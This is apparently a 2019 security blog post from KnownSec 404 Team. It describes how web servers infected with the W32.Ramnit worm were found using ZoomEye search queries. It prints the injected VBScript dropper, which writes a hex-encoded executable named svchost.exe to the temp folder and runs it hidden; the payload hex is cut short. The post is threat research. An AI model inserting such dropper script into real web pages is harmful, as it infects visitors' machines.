Open in app

Sign in

Write

Sign in

Looking for W32.Ramnit by using ZoomEye

heige
2 min readJun 5, 2019

--

by Heige(a.k.a Superhei) of KnownSec 404 Team 06/05/2019

@censysio mentioned a very strange banner data in their tweet today https://twitter.com/censysio/status/1136008471424323584 . A generic VBScript code is embedded in a large number of http server banner data (html body),The VBScript code appears to be overridden to override svchost.exe and VBScirpt code is forcibly inserted at the end of the html body data. This is a typical malicious program behavior.

<body>
<div id=”header”><h1>Server Error</h1></div>
<div id=”content”>
<div class=”content-container”><fieldset>
<h2>403 — Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
</fieldset></div>
</div>
</body>
</html>
<SCRIPT Language=VBScript><! —
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B8000000000000004000…..”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
// →</SCRIPT>

This behavior is consistent with the characteristics of the W32.Ramnit worm: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf From the analysis report of symantec, this worm started in 2010.

Sadly, so far you can find a lot of servers that have been attacked. We searched for keywords by ZoomEye: “DropFileName = \”svchost.exe\””, we can find 18,573 results. https://www.zoomeye.org/searchResult?q=%22DropFileName%20%3D%20%5C%22svchost.exe%5C%22%22

Of course, svchost.exe is probably not reliable, there may be other worm variants, we change keywords: “DropFileName” +VBScript and get 18,609 results in ZoomEye :https://www.zoomeye.org/searchResult?q=%22DropFileName%22%20%2BVBScript%20

TOP10 country

Through the “-” operator, you can be sure that you have found a small amount of malicious code for the vsexplore.exe operation, and some targets where the banner data is truncated : https://www.zoomeye.org/searchResult?q=%22DropFileName%22%20%2BVBScript%20-svchost.exe

If you have any questions about ZoomEye, please contact me:https://twitter.com/80vul

JavaScript
Zoomeye
Knownsec

--

--

heige

Written by heige

195 Followers

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams